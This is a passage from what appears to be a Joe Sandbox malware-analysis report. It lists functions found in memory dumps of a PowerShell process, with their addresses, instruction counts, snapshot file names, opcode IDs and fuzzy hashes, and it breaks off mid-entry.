                                  • Opcode ID: 99ea99507b621270ad54f4c506a05dbc04750e7cd446a62c4a952331cf0be197
                                  • Instruction ID: f71d4909b62fefeeae99ec712fe34a870b3825c60939f1c1cc99c8a6296e77d2
                                  • Opcode Fuzzy Hash: 99ea99507b621270ad54f4c506a05dbc04750e7cd446a62c4a952331cf0be197
                                  • Instruction Fuzzy Hash: 0E01F2313093A11FC3068AA4AC589FF7FAADFC626170800ABE600DB252DB744C0687E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB4BCF Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5a37d3ece20ff1ba9f290a8edddd69a2ae4717246dc0d1637503e9b4b03fb48e
                                  • Instruction ID: 0693a3199f6fb34ba8c304449d401b779973ab2daed23c01cb8dfa08283d9417
                                  • Opcode Fuzzy Hash: 5a37d3ece20ff1ba9f290a8edddd69a2ae4717246dc0d1637503e9b4b03fb48e
                                  • Instruction Fuzzy Hash: DD118871A14154CFCB689BA9D8805EDB3F2FB89722F148069E902EB711CB75AA01CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D35FF8 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7d5b46fbd23c00a9b1247becbc36d3e1f71859d6eb81feb0df5d41ca3544718b
                                  • Instruction ID: 6e699f5fcb9356fc9ff1a9f1b237316beba4b2024b2b4b589237f41e1a3f82e3
                                  • Opcode Fuzzy Hash: 7d5b46fbd23c00a9b1247becbc36d3e1f71859d6eb81feb0df5d41ca3544718b
                                  • Instruction Fuzzy Hash: 49016970B006069BCB11DB68D8519EFB3E6EFC5315F044439E918FB344EB34A9058BA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C69EB2 Relevance: .0, Instructions: 48COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8dd3ed746643932d2cea4fc8cf0bedd782fbfbbdd52b03ddc48af4fc833297b7
                                  • Instruction ID: 4dd770ed841f4c5716ea6c5d68378e0e39db1ab29ecfb9039a057de9c141c2df
                                  • Opcode Fuzzy Hash: 8dd3ed746643932d2cea4fc8cf0bedd782fbfbbdd52b03ddc48af4fc833297b7
                                  • Instruction Fuzzy Hash: C701FDF17097128FDB318E25C5C8B6237E89F41654F0A44AEE809CB2A2D779FE048792
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3A150 Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a96c90bb8ec852a0e334b304559c68b81ced34996fff841aad12de2c1245b348
                                  • Instruction ID: 20e3a8f4fd390df69f908fc3ea21cf6b64460ac6b7e2f947b608f31b503b20bf
                                  • Opcode Fuzzy Hash: a96c90bb8ec852a0e334b304559c68b81ced34996fff841aad12de2c1245b348
                                  • Instruction Fuzzy Hash: C001F2B0B00215ABE7149B58DC10BBFBBB6EBC5711F24407AF644AB2C1CBB0A915C7A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D35B77 Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dde4312fa4a9e608b395c8d6ecffe02c809388edc38291a1708d6c7e58afd160
                                  • Instruction ID: a4e0e69aab33cde8df540f7c6b4e0c2095ca3519d1f526c8c212c5d020c6670a
                                  • Opcode Fuzzy Hash: dde4312fa4a9e608b395c8d6ecffe02c809388edc38291a1708d6c7e58afd160
                                  • Instruction Fuzzy Hash: BEF0F4313492605FC3048A68E8449FE7FAAEFC6221B14006BE201DB251CB744C038791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D39A40 Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4920d7386c80dc884d1ecd7705155f6993fbbffae030bd79d6bf418c7b7ceaf
                                  • Instruction ID: 569c96ca3a0ed3c124f838cb8d5a40b052bcc4e0f8a79d6ee98a9a904393cde5
                                  • Opcode Fuzzy Hash: b4920d7386c80dc884d1ecd7705155f6993fbbffae030bd79d6bf418c7b7ceaf
                                  • Instruction Fuzzy Hash: 7701F2B0B002556BE7109B989C10BBFBFB6DB85701F24407AE608AB6C1CBB06915C7A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D39A3F Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0b19f945f902803c3c7467cca29b28d3d8982a3a9146518ddc006590b3bc7fa0
                                  • Instruction ID: c2a5c96934097c82799f0740e12c7194399abbda5babc3d91bcbd585a808a2d8
                                  • Opcode Fuzzy Hash: 0b19f945f902803c3c7467cca29b28d3d8982a3a9146518ddc006590b3bc7fa0
                                  • Instruction Fuzzy Hash: 6801F2B0B052556FE7108BA89C10FFFBFB69B85701F24417AE548AB6D2CBB05915CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0083D01D Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1671476810.000000000083D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_83d000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5a2379d9efe32a60df2b603fcf646bec82ac67e2c4e6f1d3a0028ea1ff82bb1f
                                  • Instruction ID: 1b546e31126ae71b44b8a3309c1476701c0af680ffbc208f02b084c354017260
                                  • Opcode Fuzzy Hash: 5a2379d9efe32a60df2b603fcf646bec82ac67e2c4e6f1d3a0028ea1ff82bb1f
                                  • Instruction Fuzzy Hash: 5E01FC3140878499E7148A25DCC4B6AFFD8EF81B68F18C059ED499B186C3799841C6F1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3B370 Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0dbb9aeca82a1453b697e39588a57e9fe1c75bba8f0a6efc2621dd57164bb7c8
                                  • Instruction ID: cdcb2a58661d67b9c84106ef217b0c6ec644d874f4b0207f1947893395ee9b98
                                  • Opcode Fuzzy Hash: 0dbb9aeca82a1453b697e39588a57e9fe1c75bba8f0a6efc2621dd57164bb7c8
                                  • Instruction Fuzzy Hash: EDF04CF6205365ABCB204A258800FEBFFED9F81640F05406BF905CB291C135C801C3A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBC10A Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ecd189eab41b67aa06e51687ff533ecd7988a71cd617d43ff5d013daae2c937f
                                  • Instruction ID: 4b85db74baa1412bbf8b715b9c60f0a574a9bce831d1eafa50681cde0a270435
                                  • Opcode Fuzzy Hash: ecd189eab41b67aa06e51687ff533ecd7988a71cd617d43ff5d013daae2c937f
                                  • Instruction Fuzzy Hash: 45017875604389DFCB06DF68C8418CD7B71BF86220B6241A6E9519B3A2D3359D16CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3A888 Relevance: .0, Instructions: 40COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7bbc189a4102d6e3cb762737b242234862bb2f6afce4a204e8df86ce931a2aba
                                  • Instruction ID: 32a7c66d2f7a7c01d59e28810816bd526b342a94f3d266a8de99473b1e300a68
                                  • Opcode Fuzzy Hash: 7bbc189a4102d6e3cb762737b242234862bb2f6afce4a204e8df86ce931a2aba
                                  • Instruction Fuzzy Hash: F8017871301745CFC7289EA9E084B96B3E5EF86321F04096DE4CA87651CB31E886CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C6B3B0 Relevance: .0, Instructions: 40COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 37986756c06e5b827b541efcaeb73178cdd39ec2295af217f49413e830e84b7e
                                  • Instruction ID: d1aecc5efaa0b5a0ac51fae9220c02b739b86aa1bae56e223746a439fdd5135c
                                  • Opcode Fuzzy Hash: 37986756c06e5b827b541efcaeb73178cdd39ec2295af217f49413e830e84b7e
                                  • Instruction Fuzzy Hash: 0AF046717046049FC320AB19E8C58AEBBE5EBC1321B59C42EE00DCB751CE25AC0B4791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB96D8 Relevance: .0, Instructions: 40COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: db36f9a058f4118507168d68b4a545538e6f698fa67554489206235b98f83e1f
                                  • Instruction ID: d4d30ea24236d390e9668a0017bed141ce860122dece6196890f12aec34fab85
                                  • Opcode Fuzzy Hash: db36f9a058f4118507168d68b4a545538e6f698fa67554489206235b98f83e1f
                                  • Instruction Fuzzy Hash: C001F470909348AFCB02DFB4881D59E7FB9EF45200F0141AADA04DB241EA388A05CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C6D040 Relevance: .0, Instructions: 39COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 76de4be632aafc6d5e0f2ff9f6ec819ad9ae6f7e4c71e1bf1e6a4df924008844
                                  • Instruction ID: 222349450900a6523b19533b985f73072e1f2a83506fe5879781615b51791e82
                                  • Opcode Fuzzy Hash: 76de4be632aafc6d5e0f2ff9f6ec819ad9ae6f7e4c71e1bf1e6a4df924008844
                                  • Instruction Fuzzy Hash: 7DF031B4F0021A9FCF54EFA998893AEBBF1EF88210F208065D519D7254E6315A128B81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBD3E0 Relevance: .0, Instructions: 37COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aae78eec6ba4959c154c474c316217c1f7b7494a7c3c94b6906be444f31a80aa
                                  • Instruction ID: 02619e5d488805c8758afb6dd2b616f7af4fe57910d1484d8a89292a2a7c788b
                                  • Opcode Fuzzy Hash: aae78eec6ba4959c154c474c316217c1f7b7494a7c3c94b6906be444f31a80aa
                                  • Instruction Fuzzy Hash: 33F09031A0938C9FCB12DFB09C512E97FF49B02201F1441E7D848C7192EA349B49D761
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0083D01C Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1671476810.000000000083D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_83d000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c1a05a1814bcc4a08673b2fd06748cb99488af814e0f6d3a00f7510bf297c32
                                  • Instruction ID: 4fb0fadc6f85e0bbd7518c4ac580f08d6398696d609533ba33b01eb963d9a185
                                  • Opcode Fuzzy Hash: 7c1a05a1814bcc4a08673b2fd06748cb99488af814e0f6d3a00f7510bf297c32
                                  • Instruction Fuzzy Hash: A0F06272404784AEE7148A15DCC4B62FBE8EB91B78F18C15AED585B286C2799C44CAB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C66F28 Relevance: .0, Instructions: 34COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1d0bcc88b58341a7a621aa5f11c08c8db614a93bdc8692ea45dedc08ab6d4dcd
                                  • Instruction ID: d99b74304971abeebb7ae03a95eedc1915e4148d1f92f507c815d4bf6c3d5cd6
                                  • Opcode Fuzzy Hash: 1d0bcc88b58341a7a621aa5f11c08c8db614a93bdc8692ea45dedc08ab6d4dcd
                                  • Instruction Fuzzy Hash: 63E04F3330411A075B08E6BF78841AF77DFDFC567A3088076E60DC2A40EE24D81652A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBB630 Relevance: .0, Instructions: 34COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f37dbdd3660b6770ba10825b57f7be35b63349c4b31704993bf66bbc4852a2c3
                                  • Instruction ID: acd3b1c16a759663e130ae60d6ebbac505035c796f44be3d21a363c190e77c8f
                                  • Opcode Fuzzy Hash: f37dbdd3660b6770ba10825b57f7be35b63349c4b31704993bf66bbc4852a2c3
                                  • Instruction Fuzzy Hash: 1BF0E272A082556FC719CA6ADC08ADF7BBAEB89360F0480BBE416C3681DA3449048B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D35BE8 Relevance: .0, Instructions: 31COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 54324bbf929e495318e0b378bb58f965bd9b5efb2c80a24cdc49b4321c66820d
                                  • Instruction ID: d3d4161d290097641ec9de5c27c42791e2df351e36ba502b51f802943ad5ba01
                                  • Opcode Fuzzy Hash: 54324bbf929e495318e0b378bb58f965bd9b5efb2c80a24cdc49b4321c66820d
                                  • Instruction Fuzzy Hash: 40F0A0313001196FC7049A98E8849BFBBAAEFC9260B04442AF605D7350DFB15C0187A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D36910 Relevance: .0, Instructions: 31COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f0847a3ee31b5b1acd36c09a2b07afa7c837df48a7e5e43d1f33338b10742079
                                  • Instruction ID: fc0114248ac900283eef28599dc79762b030a5bc578020fbf44664d8276f21f1
                                  • Opcode Fuzzy Hash: f0847a3ee31b5b1acd36c09a2b07afa7c837df48a7e5e43d1f33338b10742079
                                  • Instruction Fuzzy Hash: A4E068213002902FC2065AB5A810BFF7B9FCFC6251F02017AE109EB382DE235E0147F1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBC07A Relevance: .0, Instructions: 31COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8bc7106782ecae793784d53b4bd18054d82271b1ca63e722bf93fb100183d72d
                                  • Instruction ID: 4ff22756b8a252f21086d6b6b29e6158a6aa82b41f7baa3a13b3858d35c0f8e4
                                  • Opcode Fuzzy Hash: 8bc7106782ecae793784d53b4bd18054d82271b1ca63e722bf93fb100183d72d
                                  • Instruction Fuzzy Hash: 96F01D71941209DFCF349FA0E5845DDBFB2FB48355F148019F405AB251CB398941DF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D395DE Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 64d0f39f07b4cea400ab36c1865c6c2bff797ce1f90044d4b646b82c91898ba2
                                  • Instruction ID: 01bc6049f1faaac4415dd73786de6d9ec28d2017973222c8257cb3d5062f7b77
                                  • Opcode Fuzzy Hash: 64d0f39f07b4cea400ab36c1865c6c2bff797ce1f90044d4b646b82c91898ba2
                                  • Instruction Fuzzy Hash: 78E092362052542F97154566AC0499B7F6BEBC15B03158177E848C7250ED70DC06C2B5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3A107 Relevance: .0, Instructions: 27COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9ca6be1dac386e88d60def83db78120039f15a99d0ef11e44225e8bbad331eb2
                                  • Instruction ID: a99b49cdad9a5a5032bf684ef9f357a3e63518c318fc36e13e590be2ec5e7ed3
                                  • Opcode Fuzzy Hash: 9ca6be1dac386e88d60def83db78120039f15a99d0ef11e44225e8bbad331eb2
                                  • Instruction Fuzzy Hash: 44E0D876508695AFC7064B1598144A6FFF9EE8B51031D83C7E484CB213C526DD87DBF1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C667F8 Relevance: .0, Instructions: 27COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5bf5d98d9a629855285293e06e879481b90c2c7e7953cd623dd9545a6e283e46
                                  • Instruction ID: 70906912462ed012ee9ad1a09c79efb78fbd05cc5fccd56b64c48c42fd4fa3d6
                                  • Opcode Fuzzy Hash: 5bf5d98d9a629855285293e06e879481b90c2c7e7953cd623dd9545a6e283e46
                                  • Instruction Fuzzy Hash: 2CE0DF325042685FC70667B5AC884CFBF34DF8A270B010227EA34D7291D6300A18C7E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBB640 Relevance: .0, Instructions: 27COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eab2222442e4a9d8df783a6027add2a411dfd4ee91b44c7d40b7c15847dc04ef
                                  • Instruction ID: f0e957eeb3e10fd7ad264a79a996baceb70e160c26510bc0a4dd6a5375d33853
                                  • Opcode Fuzzy Hash: eab2222442e4a9d8df783a6027add2a411dfd4ee91b44c7d40b7c15847dc04ef
                                  • Instruction Fuzzy Hash: 79E01276E04119ABCB18DE9AE8086EE77BEEB88261F14807BE51AD3640DA7459048F54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBD3D0 Relevance: .0, Instructions: 27COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 19d1a880fad5cfc8300d23d48fd60fa506b618708f3b6082f7891e6e3f6c879c
                                  • Instruction ID: cb3eac6ea211a14d571567370e0d05e44a3d2afc6d689af7975d58a538f6ac25
                                  • Opcode Fuzzy Hash: 19d1a880fad5cfc8300d23d48fd60fa506b618708f3b6082f7891e6e3f6c879c
                                  • Instruction Fuzzy Hash: 5AF09271A093C89EDF12DFB199412ED7FF49B06212F1442F7E845D2152E6388788EB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3D698 Relevance: .0, Instructions: 25COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d487f96ee82ec7daa954787e6c2c6fe2180f49deb937d90e35541b7512dd7499
                                  • Instruction ID: 66508ad65792f52e0e58af467760b7df6cf46d1fafb0c91dabd255922b5815cd
                                  • Opcode Fuzzy Hash: d487f96ee82ec7daa954787e6c2c6fe2180f49deb937d90e35541b7512dd7499
                                  • Instruction Fuzzy Hash: 75F039B1A0021D9FDB149F54CA187EEBAFAFB88300F14042AD506B7290CBB50D04CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3B0E8 Relevance: .0, Instructions: 23COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3ebd6b510b7d164f0d44390381273be08608f1494bfeb5b4167b3bbd821eb8d
                                  • Instruction ID: 1e5bece73893a31ac1d31940432e15e0c7757ed8e4d06be7536fdee92e35cb1e
                                  • Opcode Fuzzy Hash: a3ebd6b510b7d164f0d44390381273be08608f1494bfeb5b4167b3bbd821eb8d
                                  • Instruction Fuzzy Hash: AFE0ECBAA04119AF97008E45EC44C57FBADFB896743154296FA0897302C731EC81CBF0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D388B7 Relevance: .0, Instructions: 23COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 36cc689bdb684cee41cfdbc685b92dc28d7cc984e81afe8c74d23a5ef3e00b03
                                  • Instruction ID: 49c31871d8a149ee071c4aaffe8fe97d6bdf076a84fb69752ae206016303d2e3
                                  • Opcode Fuzzy Hash: 36cc689bdb684cee41cfdbc685b92dc28d7cc984e81afe8c74d23a5ef3e00b03
                                  • Instruction Fuzzy Hash: 6BE09221608191AFC3424B149824466FFB9EF8A12131CC2D7E8848B243C22EDC83CBE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3A878 Relevance: .0, Instructions: 23COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a6a52626eb59a81ca8a4139c08a524c4985c74e3a2d06a6bbb3fdabfeeeb02f
                                  • Instruction ID: b25bd0624418aaf51c3710b7700fa231a7715efaacddced232a423ce62f63bfb
                                  • Opcode Fuzzy Hash: 1a6a52626eb59a81ca8a4139c08a524c4985c74e3a2d06a6bbb3fdabfeeeb02f
                                  • Instruction Fuzzy Hash: 9BE0D8B220A784DFC722CF68E040781FBF1BF52311F48059AE0D587622C336A495CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D36920 Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3d80106318bbcfcd8c43bdba6608c851390af19f45bfaebeff68312c49e2eacb
                                  • Instruction ID: b0d89fbd189d5b4ca4ee3f3aa97d18f245be0d23317e432a49ead8674af1e369
